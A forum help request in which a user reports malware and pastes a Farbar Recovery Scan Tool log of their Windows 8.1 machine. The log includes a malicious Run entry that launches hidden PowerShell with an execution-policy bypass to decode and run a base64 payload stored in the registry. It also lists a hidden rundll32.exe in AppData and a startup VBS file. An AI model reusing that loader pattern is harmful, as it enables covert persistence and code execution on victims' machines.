Jump to content

Welcome to Geeks to Go - Register now for FREE

Need help with your computer or device? Want to learn new tech skills? You're in the right place!
Geeks to Go is a friendly community of tech experts who can solve any problem you have. Just create a free account and post your question. Our volunteers will reply quickly and guide you through the steps. Don't let tech troubles stop you. Join Geeks to Go now and get the support you need!

How it Works Create Account
Photo

My computer has been infected [Closed]

Started by Dennis Kiptoo , May 05 2017 03:49 AM

  • This topic is locked This topic is locked

#1
Dennis Kiptoo
Posted 05 May 2017 - 03:49 AM

Dennis Kiptoo

    New Member

  • Member
  • Pip
  • 1 posts

My computer is infected by malware and viruses that have led to the closure of my Upwork's online account be the administrator. Upwork is an online freelancing platform where clients hire writers for their projects.

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 03-05-2017 01
Ran by DENNIS M (administrator) on NON (05-05-2017 12:44:08)
Running from C:\Users\USER\Desktop
Loaded Profiles: DENNIS M (Available Profiles: DENNIS M)
Platform: Windows 8.1 Pro (X64) Language: English (United Kingdom)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
(Andrea Electronics Corporation) C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_295b5b4710f6d77b\AESTSr64.exe
(Foxit Software Inc.) C:\Program Files (x86)\Foxit Software\Foxit Reader\FoxitConnectedPDFService.exe
(IDT, Inc.) C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_295b5b4710f6d77b\stacsv64.exe
(AVAST Software s.r.o.) C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe
(Smadsoft) C:\Program Files (x86)\SMADAV\SMΔRTP.exe
(IDT, Inc.) C:\Program Files\SigmaTel\C-Major Audio\WDM\sttray64.exe
() C:\Program Files (x86)\Upwork\upwork.exe
() C:\Program Files (x86)\WebcamMax\wcmmon.exe
(Skype Technologies S.A.) C:\Program Files (x86)\Skype\Phone\Skype.exe
() C:\Program Files (x86)\Upwork\upwork.exe
() C:\Program Files (x86)\Upwork\upwork.exe
(Creative Technology Ltd.) C:\Windows\OEM02Mon.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastUI.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.5\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.5\GoogleCrashHandler64.exe
(Smadav Software) C:\Program Files (x86)\SMADAV\SmadavProtect32.exe
(Smadav Software) C:\Program Files (x86)\SMADAV\SmadavProtect64.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe

==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvLaunch.exe [213824 2017-05-05] (AVAST Software)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [SMΔRT-Protection] => C:\Program Files (x86)\Smadav\SMΔRTP.exe [1736704 2017-01-14] (Smadsoft)
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\Run: [CyberGhost] => "C:\Program Files\CyberGhost 6\CyberGhost.exe" /autostart /min
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\Run: [Upwork] => C:\Program Files (x86)\Upwork\upwork.exe [2227496 2017-03-22] ()
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\Run: [WebcamMaxAutoRun] => C:\Program Files (x86)\WebcamMax\wcmmon.exe [1038848 2011-07-17] ()
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [27545048 2017-03-14] (Skype Technologies S.A.)
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\Run: [{245CAE4C-B7DC-4752-B92F-63DC8D25D4FD}] => powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\wKNjXxBOSrsVKip').XFXEEJHACAA)));
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\Policies\Explorer: [DisallowRun] 1
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\Policies\Explorer\DisallowRun: [1] Mshta.exe
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\Policies\Explorer\DisallowRun: [2] powershell.exe
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\Policies\Explorer\DisallowRun: [3] bitsadmin.exe
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: F - "F:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {3095b6bd-de5e-11e6-826c-001e101ff262} - "F:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {7a8767a9-d7cb-11e6-8267-bf6ca37c8cc0} - "F:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {7a8767d2-d7cb-11e6-8267-bf6ca37c8cc0} - "F:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {7a876c3c-d7cb-11e6-8267-bf6ca37c8cc0} - "F:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {7a87767e-d7cb-11e6-8267-bf6ca37c8cc0} - "F:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {87768129-1e8e-11e7-82b0-001e101f9824} - "I:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {9f488244-2460-11e7-82b4-001e101f1966} - "F:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {9f488259-2460-11e7-82b4-001e101f1966} - "F:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {9f488288-2460-11e7-82b4-001e101f1966} - "F:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {b12ce2cb-f2e7-11e6-828b-ac9469c63d41} - "F:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {de97fe40-2cd4-11e7-82be-001e101fc8e2} - "I:\Auto.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {de980e8d-2cd4-11e7-82be-001e101fc8e2} - "I:\Auto.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {f2c454ea-e7bf-11e6-8278-001e101f5f92} - "I:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {f2c45c74-e7bf-11e6-8278-001e101f5f92} - "I:\Windows/AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {f883703f-b67f-11e6-824f-d86e29ba0045} - "F:\LGAutoRun.exe"
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
Startup: C:\Users\USER\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs [2017-04-05] ()

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

ProxyServer: [S-1-5-21-1975919165-801266099-53085287-1001] => 172.16.63.3:3128
Tcpip\..\Interfaces\{184075C4-2C8A-47A2-9E62-9B050AC455FE}: [DhcpNameServer] 192.168.43.1
Tcpip\..\Interfaces\{81B6590E-6D8F-436F-A5D6-5C5E2B0D4DAA}: [NameServer] 196.201.216.21 196.201.217.7
Tcpip\..\Interfaces\{9BC7269C-8318-4392-AE33-BA4A97141ADE}: [NameServer] 196.201.216.21 196.201.217.7
Tcpip\..\Interfaces\{EB8D0396-AB58-4921-9F28-5549F56295E6}: [NameServer] 196.201.217.7 196.201.216.21

Internet Explorer:
==================
HKU\S-1-5-21-1975919165-801266099-53085287-1001\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/?ocid=iehp
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office15\OCHelper.dll [2012-10-01] (Microsoft Corporation)
BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll [2017-05-05] (AVAST Software)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office15\URLREDIR.DLL [2012-10-01] (Microsoft Corporation)
BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office15\OCHelper.dll [2012-10-01] (Microsoft Corporation)
BHO-x32: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll [2017-05-05] (AVAST Software)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office15\URLREDIR.DLL [2012-10-01] (Microsoft Corporation)

FireFox:
========
FF DefaultProfile: 70sdybgu.default
FF ProfilePath: C:\Users\USER\AppData\Roaming\Mozilla\Firefox\Profiles\70sdybgu.default [2017-05-05]
FF NetworkProxy: Mozilla\Firefox\Profiles\70sdybgu.default -> backup.ftp", "172.16.63.3"
FF NetworkProxy: Mozilla\Firefox\Profiles\70sdybgu.default -> backup.ftp_port", 3128
FF NetworkProxy: Mozilla\Firefox\Profiles\70sdybgu.default -> backup.socks", "172.16.63.3"
FF NetworkProxy: Mozilla\Firefox\Profiles\70sdybgu.default -> backup.socks_port", 3128
FF NetworkProxy: Mozilla\Firefox\Profiles\70sdybgu.default -> backup.ssl", "172.16.63.3"
FF NetworkProxy: Mozilla\Firefox\Profiles\70sdybgu.default -> backup.ssl_port", 3128
FF NetworkProxy: Mozilla\Firefox\Profiles\70sdybgu.default -> ftp", "172.16.63.3"
FF NetworkProxy: Mozilla\Firefox\Profiles\70sdybgu.default -> ftp_port", 3128
FF NetworkProxy: Mozilla\Firefox\Profiles\70sdybgu.default -> http", "172.16.63.3"
FF NetworkProxy: Mozilla\Firefox\Profiles\70sdybgu.default -> http_port", 3128
FF NetworkProxy: Mozilla\Firefox\Profiles\70sdybgu.default -> share_proxy_settings", true
FF NetworkProxy: Mozilla\Firefox\Profiles\70sdybgu.default -> socks", "172.16.63.3"
FF NetworkProxy: Mozilla\Firefox\Profiles\70sdybgu.default -> socks_port", 3128
FF NetworkProxy: Mozilla\Firefox\Profiles\70sdybgu.default -> ssl", "172.16.63.3"
FF NetworkProxy: Mozilla\Firefox\Profiles\70sdybgu.default -> ssl_port", 3128
FF NetworkProxy: Mozilla\Firefox\Profiles\70sdybgu.default -> type", 0
FF Extension: (Grammarly for Firefox) - C:\Users\USER\AppData\Roaming\Mozilla\Firefox\Profiles\70sdybgu.default\Extensions\[email protected] [2017-05-04]
FF Extension: (Simple YouTube to MP3/MP4 Converter and Downloader) - C:\Users\USER\AppData\Roaming\Mozilla\Firefox\Profiles\70sdybgu.default\Extensions\[email protected] [2017-01-23]
FF Extension: (Youtube Downloader - 4K Download) - C:\Users\USER\AppData\Roaming\Mozilla\Firefox\Profiles\70sdybgu.default\Extensions\[email protected] [2017-01-14]
FF Extension: (1-Click YouTube Video Downloader) - C:\Users\USER\AppData\Roaming\Mozilla\Firefox\Profiles\70sdybgu.default\Extensions\[email protected] [2017-01-14]
FF Extension: (Youtube Best Video Downloader 2) - C:\Users\USER\AppData\Roaming\Mozilla\Firefox\Profiles\70sdybgu.default\Extensions\{170503FA-3349-4F17-BC86-001888A5C8E2}.xpi [2017-04-10]
FF Extension: (Copy As Plain Text) - C:\Users\USER\AppData\Roaming\Mozilla\Firefox\Profiles\70sdybgu.default\Extensions\{1a5dabbd-0e74-41da-b532-a364bb552cab}.xpi [2017-01-30]
FF Extension: (Download YouTube Videos as MP4) - C:\Users\USER\AppData\Roaming\Mozilla\Firefox\Profiles\70sdybgu.default\Extensions\{b9bfaf1c-a63f-47cd-8b9a-29526ced9060}.xpi [2017-02-18]
FF Extension: (Shield Recipe Client) - C:\Users\USER\AppData\Roaming\Mozilla\Firefox\Profiles\70sdybgu.default\features\{70a68181-2263-4af4-847f-b2a1a5404527}\[email protected] [2017-05-01]
FF Plugin: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/pdf -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [2016-08-09] (Foxit Corporation)
FF Plugin: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.fdf -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [2016-08-09] (Foxit Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32.dll [2016-11-27] ()
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/pdf -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [2016-08-09] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.fdf -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [2016-08-09] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.xdp -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [2016-08-09] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.xfdf -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [2016-08-09] (Foxit Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2012-10-01] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office15\NPSPWRAP.DLL [2012-10-01] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-28] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-28] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.2.0 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.4 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2014-12-03] (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npMeetingJoinPluginOC.dll [2012-10-01] (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll [2014-12-03] (Adobe Systems Inc.)

Chrome:
=======
CHR Session Restore: Default -> is enabled.
CHR Profile: C:\Users\USER\AppData\Local\Google\Chrome\User Data\Default [2017-05-04]
CHR Extension: (Google Docs) - C:\Users\USER\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-01-11]
CHR Extension: (Google Drive) - C:\Users\USER\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-01-11]
CHR Extension: (YouTube) - C:\Users\USER\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-01-11]
CHR Extension: (Google Docs Offline) - C:\Users\USER\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-01-11]
CHR Extension: (Grammarly for Chrome) - C:\Users\USER\AppData\Local\Google\Chrome\User Data\Default\Extensions\kbfnbcaeplbcioakkpcpgfkobkghlhen [2017-04-27]
CHR Extension: (Chrome Web Store Payments) - C:\Users\USER\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-03-14]
CHR Extension: (Gmail) - C:\Users\USER\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-01-11]
CHR Extension: (Chrome Media Router) - C:\Users\USER\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-04-10]

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AESTFilters; C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_295b5b4710f6d77b\AESTSr64.exe [86016 2007-09-20] (Andrea Electronics Corporation)
R3 aswbIDSAgent; C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe [7346208 2017-05-05] (AVAST Software s.r.o.)
R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [263304 2017-05-05] (AVAST Software)
R2 FoxitReaderService; C:\Program Files (x86)\Foxit Software\Foxit Reader\FoxitConnectedPDFService.exe [1659592 2016-10-13] (Foxit Software Inc.)
S3 ShareItSvc; C:\Program Files (x86)\SHAREit\SHAREit\Shareit.Service.exe [33224 2016-04-15] (SHAREit Technologies Co.Ltd)
R2 STacSV; C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_295b5b4710f6d77b\STacSV64.exe [122880 2008-02-15] (IDT, Inc.)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [346872 2013-08-22] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23840 2013-08-22] (Microsoft Corporation)

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 aswbidsdriver; C:\Windows\system32\drivers\aswbidsdrivera.sys [311808 2017-05-05] (AVAST Software s.r.o.)
R0 aswbidsh; C:\Windows\system32\drivers\aswbidsha.sys [190256 2017-05-05] (AVAST Software s.r.o.)
R0 aswblog; C:\Windows\system32\drivers\aswbloga.sys [334576 2017-05-05] (AVAST Software s.r.o.)
R0 aswbuniv; C:\Windows\system32\drivers\aswbuniva.sys [49016 2017-05-05] (AVAST Software s.r.o.)
S3 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [38296 2017-05-05] (AVAST Software)
R1 aswKbd; C:\Windows\system32\drivers\aswKbd.sys [32600 2017-05-05] (AVAST Software)
R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [128648 2017-05-05] (AVAST Software)
R1 aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [101152 2017-05-05] (AVAST Software)
R0 aswRvrt; C:\Windows\system32\drivers\aswRvrt.sys [75704 2017-05-05] (AVAST Software)
R1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [1007160 2017-05-05] (AVAST Software)
R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [569192 2017-05-05] (AVAST Software)
R2 aswStm; C:\Windows\system32\drivers\aswStm.sys [158368 2017-05-05] (AVAST Software)
R0 aswVmm; C:\Windows\system32\drivers\aswVmm.sys [339696 2017-05-05] (AVAST Software)
R3 BCM43XX; C:\Windows\system32\DRIVERS\bcmwl63al.sys [5170176 2013-07-01] (Broadcom Corporation)
S3 dg_ssudbus; C:\Windows\system32\DRIVERS\ssudbus.sys [131712 2016-09-05] (Samsung Electronics Co., Ltd.)
R3 ewusbnet; C:\Windows\system32\DRIVERS\ewusbnet.sys [246224 2009-12-07] (Huawei Technologies Co., Ltd.)
R3 hwusbdev; C:\Windows\system32\DRIVERS\ewusbdev.sys [114304 2009-10-12] (Huawei Technologies Co., Ltd.)
R3 OEM02Dev; C:\Windows\system32\DRIVERS\OEM02Dev.sys [266624 2007-10-10] (Creative Technology Ltd.)
R3 OEM02Vfx; C:\Windows\system32\DRIVERS\OEM02Vfx.sys [12288 2007-03-05] (EyePower Games Pte. Ltd.)
R2 risdptsk; C:\Windows\system32\DRIVERS\risdsn64.sys [76288 2009-09-24] (REDC)
S3 tap0901; C:\Windows\system32\DRIVERS\tap0901.sys [27136 2016-04-21] (The OpenVPN Project) [File not signed]
S3 VMSMP; C:\Windows\system32\DRIVERS\vmswitch.sys [688640 2013-08-22] (Microsoft Corporation)
S3 VMSP; C:\Windows\system32\DRIVERS\vmswitch.sys [688640 2013-08-22] (Microsoft Corporation)
R2 WCMVCAM; C:\Windows\system32\DRIVERS\wcmvcam64.sys [1071032 2012-04-16] (Windows ® Win 7 DDK provider)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [34760 2013-08-22] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [265056 2013-08-22] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [124256 2013-08-22] (Microsoft Corporation)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-05-05 12:37 - 2017-05-05 12:43 - 00023145 _____ C:\Users\USER\Desktop\Addition.txt
2017-05-05 12:36 - 2017-05-05 12:44 - 00019388 _____ C:\Users\USER\Desktop\FRST.txt
2017-05-05 12:35 - 2017-05-05 12:44 - 00000000 ____D C:\FRST
2017-05-05 12:32 - 2017-05-05 12:31 - 02428928 _____ (Farbar) C:\Users\USER\Desktop\FRST64.exe
2017-05-05 12:30 - 2017-05-05 12:31 - 02428928 _____ (Farbar) C:\Users\USER\Downloads\FRST64.exe
2017-05-05 11:35 - 2017-05-05 11:35 - 00003882 _____ C:\Windows\System32\Tasks\SafeZone scheduled Autoupdate 1493973343
2017-05-05 11:35 - 2017-05-05 11:35 - 00001059 _____ C:\Users\Public\Desktop\Avast SafeZone Browser.lnk
2017-05-05 11:35 - 2017-05-05 11:35 - 00001059 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avast SafeZone Browser.lnk
2017-05-05 11:34 - 2017-05-05 11:34 - 00032600 _____ (AVAST Software) C:\Windows\system32\Drivers\aswKbd.sys
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw722D.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw7048.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw6DD6.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw6C10.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw6817.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw65F3.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw641D.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw612E.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw5DC2.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw590E.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw54C8.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw51C9.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw4F18.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw4C78.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw4979.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw46F7.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw40FB.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw3DBE.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw3B3C.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw36A7.tmp
2017-05-05 10:06 - 2017-05-05 10:06 - 00000000 ____D C:\ProgramData\SWCUTemp
2017-05-05 10:03 - 2017-05-05 10:03 - 00000000 ____D C:\Users\USER\AppData\Roaming\AVAST Software
2017-05-05 09:56 - 2017-05-05 11:12 - 00000000 ____D C:\Program Files\Common Files\AV
2017-05-05 09:55 - 2017-05-05 11:22 - 00004172 _____ C:\Windows\System32\Tasks\Avast Emergency Update
2017-05-05 09:55 - 2017-05-05 09:54 - 00569192 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSP.sys
2017-05-05 09:55 - 2017-05-05 09:54 - 00339696 _____ (AVAST Software) C:\Windows\system32\Drivers\aswVmm.sys
2017-05-05 09:55 - 2017-05-05 09:54 - 00158368 _____ (AVAST Software) C:\Windows\system32\Drivers\aswStm.sys
2017-05-05 09:55 - 2017-05-05 09:54 - 00128648 _____ (AVAST Software) C:\Windows\system32\Drivers\aswMonFlt.sys
2017-05-05 09:55 - 2017-05-05 09:54 - 00101152 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRdr2.sys
2017-05-05 09:55 - 2017-05-05 09:54 - 00075704 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRvrt.sys
2017-05-05 09:55 - 2017-05-05 09:54 - 00038296 _____ (AVAST Software) C:\Windows\system32\Drivers\aswHwid.sys
2017-05-05 09:55 - 2017-05-05 09:53 - 01007160 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSnx.sys
2017-05-05 09:55 - 2017-05-05 09:53 - 00334576 _____ (AVAST Software s.r.o.) C:\Windows\system32\Drivers\aswbloga.sys
2017-05-05 09:55 - 2017-05-05 09:53 - 00311808 _____ (AVAST Software s.r.o.) C:\Windows\system32\Drivers\aswbidsdrivera.sys
2017-05-05 09:55 - 2017-05-05 09:53 - 00190256 _____ (AVAST Software s.r.o.) C:\Windows\system32\Drivers\aswbidsha.sys
2017-05-05 09:55 - 2017-05-05 09:53 - 00049016 _____ (AVAST Software s.r.o.) C:\Windows\system32\Drivers\aswbuniva.sys
2017-05-05 09:54 - 2017-05-05 09:54 - 00992960 _____ (Microsoft Corporation) C:\Windows\system32\ucrtbase.dll
2017-05-05 09:54 - 2017-05-05 09:54 - 00921280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ucrtbase.dll
2017-05-05 09:54 - 2017-05-05 09:54 - 00400456 _____ (AVAST Software) C:\Windows\system32\aswBoot.exe
2017-05-05 09:42 - 2017-05-05 11:34 - 00000000 ____D C:\Program Files\AVAST Software
2017-05-05 09:40 - 2017-05-05 11:34 - 00000000 ____D C:\ProgramData\AVAST Software
2017-05-05 09:37 - 2017-05-05 09:38 - 06919904 _____ (AVAST Software) C:\Users\USER\Downloads\avast_free_antivirus_setup_online.exe
2017-05-05 09:37 - 2017-05-05 09:38 - 06919904 _____ (AVAST Software) C:\Users\Public\Desktop\avast_free_antivirus_setup_online.exe
2017-05-04 11:34 - 2017-05-04 11:34 - 00000000 ____D C:\Users\USER\Desktop\New folder
2017-05-02 19:32 - 2017-05-02 19:32 - 00013188 ____H C:\Users\USER\Documents\~WRL0251.tmp
2017-04-28 12:01 - 2017-04-28 12:01 - 00002432 _____ C:\Users\USER\Desktop\Grammarly.lnk
2017-04-28 12:01 - 2017-04-28 12:01 - 00000000 ____D C:\Users\USER\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Grammarly
2017-04-28 12:00 - 2017-04-28 12:02 - 00000000 ____D C:\Users\USER\AppData\Local\GrammarlyForWindows
2017-04-28 11:38 - 2017-04-28 11:52 - 48679480 _____ (Grammarly) C:\Users\USER\Downloads\GrammarlySetup.exe
2017-04-25 19:58 - 2017-04-25 19:58 - 00199010 __RSH C:\Users\USER\AppData\Roaming\rundll32.exe
2017-04-24 16:26 - 2017-04-24 16:26 - 00000000 ____D C:\Users\USER\Desktop\certs
2017-04-24 16:05 - 2017-05-03 15:55 - 00000000 __SHD C:\[Smad-Cage]
2017-04-24 16:05 - 2017-04-28 15:16 - 00000000 ____D C:\Program Files (x86)\SMADAV
2017-04-24 16:05 - 2017-04-24 16:05 - 00003162 _____ C:\Windows\System32\Tasks\smadav
